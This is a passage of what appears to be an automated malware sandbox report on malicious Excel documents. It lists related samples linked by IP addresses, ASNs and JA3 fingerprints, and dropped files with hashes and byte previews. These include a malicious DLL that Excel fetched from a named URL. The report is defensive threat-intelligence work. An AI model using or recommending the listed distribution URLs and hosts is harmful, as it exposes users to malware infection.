                                                                      108.170.20.75SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                  Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                    Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Heur.28366.xlsGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Heur.7735.xlsGet hashmaliciousBrowse
                                                                                            Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                              Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                    upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                                                        att-1664057138.xlsGet hashmaliciousBrowse
                                                                                                          att-226609285.xlsGet hashmaliciousBrowse
                                                                                                            185.81.0.78SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            Sign-636.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php
                                                                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                            • www.chipmania.it/mails/open.php

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                            ASN

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            DYNUUSSecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.926.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            0944mr8IJ0.exeGet hashmaliciousBrowse
                                                                                                            • 142.202.191.151
                                                                                                            3H5uZw7X3l.exeGet hashmaliciousBrowse
                                                                                                            • 142.202.191.151
                                                                                                            ezy132y3M9.exeGet hashmaliciousBrowse
                                                                                                            • 142.202.191.186
                                                                                                            RedesyTelecomunicacionesHNSecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.18756.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SecuriteInfo.com.Heur.30904.xlsGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            P4fZLHrU6d.exeGet hashmaliciousBrowse
                                                                                                            • 200.52.147.93
                                                                                                            SSASN2USSecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            kAZyIwSSsf.exeGet hashmaliciousBrowse
                                                                                                            • 108.170.20.72
                                                                                                            SecuriteInfo.com.Heur.28366.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Heur.7735.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            DocuSign_1618411389_250497852.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.72
                                                                                                            DocuSign_1329880746_256921564.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.72
                                                                                                            upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                                                            • 108.170.20.75
                                                                                                            SERVERPLAN-ASITSecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            Sign-636.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78
                                                                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                            • 185.81.0.78

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            8c4a22651d328568ec66382a84fc505fSecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign-636.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.11712.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            SecuriteInfo.com.Heur.13393.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164
                                                                                                            Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                                            • 142.202.191.164

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesSecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                              SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                  SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                    SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                      SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                        SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                          SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                              Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                  Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                                    C:\Users\user\BASE.BABAASecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                                        SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                                          SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                                            SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                              SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          Sign-979329054_1327186231.xlsGet hashmaliciousBrowse

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                            Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):59134
                                                                                                                                                                                            Entropy (8bit):7.995450161616763
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                            Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                            Entropy (8bit):3.078657124509345
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:kK7APbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:DAW3kPlE99SNxAhUeo+aKt
                                                                                                                                                                                            MD5:76C4F94E3F31035415F533015971BE6E
                                                                                                                                                                                            SHA1:C7A8552A39CA176E310DCAFCF2D198808FCE970D
                                                                                                                                                                                            SHA-256:2341CC65476F6D7FAEA43753B543EFF7DDC8CEB07F2DA3D8C33D695B24D8688C
                                                                                                                                                                                            SHA-512:066B27D84C6FD5A717D377649DCE5534749D1F15DA2E4A73B9D5B0715029A7E8B64ADE266D2369D7C5DA9B62986B90BD2856A2A85AEFE3093931972FE5645883
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: p...... ............y...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4591104
                                                                                                                                                                                            Entropy (8bit):5.0540147937501265
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                            MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                            SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                            SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                            SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\CBBE0000
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):155530
                                                                                                                                                                                            Entropy (8bit):7.660500020953335
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXa:YEGSzx0dmxk7RbsYsKtseoXq
                                                                                                                                                                                            MD5:2C9F8E47B1600F5DE2F6DCDFB24094CC
                                                                                                                                                                                            SHA1:D4BE003987DD33946B0636CFA3CA7F22095B65B5
                                                                                                                                                                                            SHA-256:A8EAB1FB3FE63C24CD13039896ADA32D0463BB1D31ECEDC59C02E661EB4054CF
                                                                                                                                                                                            SHA-512:4256D5E72B27028E98B2E896211A25D2DD3102E4625DEA37AFB2FF7E4117025952B26AA399E9673B9EF0C782376001E9E894A0B4A4B88775945F5D35F65B201D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
